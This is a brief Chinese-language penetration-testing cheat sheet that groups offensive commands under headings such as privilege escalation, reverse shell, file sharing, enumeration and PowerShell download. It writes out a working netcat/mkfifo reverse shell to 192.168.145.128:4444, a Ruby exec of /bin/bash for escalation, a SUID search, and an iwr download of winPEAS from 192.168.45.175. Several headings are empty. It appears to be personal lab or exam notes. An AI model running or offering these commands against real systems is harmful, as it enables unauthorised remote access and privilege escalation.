跳到主內容

【總覽】Tools

常用網站

提權

echo 'exec "/bin/bash"' > app.rb

編碼

寫作

reverse shell

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 192.168.145.128 4444 >/tmp/f

 

連線

remote desk top

portforward

橫移
Tunnel

 

分享

smb

apache

    • systemctl start apache2

python

    • python3 -m http.server 80

列舉

提權

find / -perm -u=s -type f 2>/dev/null | grep -v 'snap'

字典

密碼破解

漏洞確認

AS-REP Roasting

Powershell

  • iwr (檔案下載)
    iwr -uri http://192.168.45.175/winPEASx64.exe -Outfile winPEAS.exe